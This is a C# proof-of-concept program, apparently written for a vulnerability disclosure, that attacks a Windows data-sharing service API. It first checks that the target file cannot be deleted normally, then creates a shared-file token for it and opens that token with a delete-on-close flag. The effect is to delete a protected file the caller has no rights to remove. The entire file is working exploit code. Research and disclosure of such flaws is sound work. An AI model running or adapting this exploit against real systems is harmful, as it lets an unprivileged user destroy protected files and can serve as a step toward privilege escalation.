﻿using DataSharingServiceCommon;
using Microsoft.Win32.SafeHandles;
using System;
using System.IO;

namespace PoC
{
    class Program
    {
        static void Main(string[] args)
        {
            try
            {
                if (args.Length < 1)
                {
                    Console.WriteLine("Usage: path to file to delete");
                }

                string path = Path.GetFullPath(args[0]);
                if (!File.Exists(path))
                {
                    throw new Exception("File doesn't exist to delete");
                }

                try
                {
                    File.Delete(path);
                    Console.WriteLine("Could already delete the file. Pick one which can't be deleted");
                    return;
                }
                catch (Exception)
                {
                }

                DS_SHARE_ACCESS_CONTROL access_control = new DS_SHARE_ACCESS_CONTROL();
                Api.DSCreateSharedFileToken(path, access_control, DS_TOKEN_LIFETIME_TYPE.Type0, DS_TOKEN_USAGE.Type0, out string token).Check();
                Console.WriteLine("Token: {0}", token);
                Api.DSOpenSharedFile(token, DS_OPEN_FLAGS.DeleteOnClose, out SafeFileHandle handle).Check();
                using (handle)
                {
                    Console.WriteLine("Opened handle {0}", handle.DangerousGetHandle());
                }
                if (File.Exists(path))
                {
                    throw new Exception("File wasn't deleted as expected");
                }
                Console.WriteLine("Done");
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }
    }
}
